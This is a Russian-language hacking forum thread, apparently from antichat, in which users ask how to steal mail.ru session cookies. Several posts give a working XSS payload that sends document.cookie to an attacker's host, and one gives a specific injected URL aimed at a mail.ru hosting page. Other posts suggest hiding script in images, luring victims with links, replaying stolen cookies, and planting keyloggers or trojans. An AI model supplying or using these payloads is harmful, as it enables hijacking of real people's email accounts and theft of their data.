Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??

Для этого тебе нужна XSS на mail.ru ;)

Для этого тебе нужна XSS на mail.ru ;)


Если просматривать письмо через Ж то можно украсть сессию. Только как нужно его просматривать я не знаю =(

а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.

Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??
снач можешь прочитать вот тут (http://forum.antichat.ru/thread20140.html) потом можешь посмареть тут (http://video.antichat.ru/) а уже потом ...или найти самому активную или пасссиввную...или зайти сюда (http://forum.antichat.ru/thread21437.html) или сюда (http://forum.antichat.ru/thread35802.html) и поискать пост с XSS на mail.ru

а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.

Как это толку? в опере меняеш куки и всё..

Для этого тебе нужна XSS на mail.ru ;)

ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа? :)

ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа? :)
просто код вот:

<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>

естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст.
Разве что за $

естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!

ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,

ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
Куда бы ты не заманивал пользователя, все равно должен быть xss на целевом сайте (в данном случае mail.ru)

ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,

Ага, ссылка на сни должна быть на mail.ru, например в письме, но почта фильтрует подобные ссылки.. я слышал можно закодировать ссылка со криптом както... это так? кто знает?

просто код вот:

<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>

естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст.
Разве что за $

Вот именно что обычный код не пройдёт, система его забанит, вот и создал эту тему чтоб узнать рабочий код XSS под сниф для mail.ru естественно не за деньги.. за деньги можно всё купить.. а вот чтоб своими мозгам.. у меня покачто мозгов для этого нехватает видимо, поэтому и спрашиваю у людей. )) :)

А можно обычный код <script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать?????? :confused:

нда... весь прикол в том что выложенные Xss почти все уже не работают..((( :(

нда... весь прикол в том что выложенные Xss почти все уже не работают..((( :(
Неработает одно, работает другое... Нужно мыло Чела? пихни ему кейлогер, узнаешь не только пасс от его мыла...
Да знаю - легко сказать. И тем немение троян работает!
Ещё много дебилов, чьи антивиры пропускают старые трояны, вирусы, кейлогеры... В пример могу взять свой университет - стадо тупых носорогов сидящих за компами...

Неработает одно, работает другое... Нужно мыло Чела? пихни ему кейлогер, узнаешь не только пасс от его мыла...
Да знаю - легко сказать. И тем немение троян работает!
Ещё много дебилов, чьи антивиры пропускают старые трояны, вирусы, кейлогеры... В пример могу взять свой университет - стадо тупых носорогов сидящих за компами...

Хм.. хорошая идея но всё же если кто что может сказать полезного насчёт снифа - пишите. А насчёт кейлогера - дайте ссылку на хороший без лагов, а то их тоже не мало в сети.. А насчёт универа - у меня также вгруппе стадо придурков) ;)

нда... весь прикол в том что выложенные Xss почти все уже не работают..((( :(

как не работают??? вот тебе пример...

http://hosting.mail.ru/selectLoginForConstructor.jsp?constructor="><script>navigate('http://site.ru/s.gif?'.concat(document.cookie))</script> ///при этом можно открыть гифку ..и вписать туда переадресацию.....чтобы палевно не было...

встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать??????

Можно встроить в png .... в конец записать ...и в фоту на маил ру ..и то будет работать только в IE ...вот тут (http://www.securitylab.ru/contest/291564.php) почитай

Как это толку? в опере меняеш куки и всё..
На мэйле привязка к IP адресу идет...

а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.
Конечно толку не будет если ты их не попробуешь в свой браузер вбить куки.А может случиться великое чудо ? %) и появиться надпись здраствуйте такой такой то :)))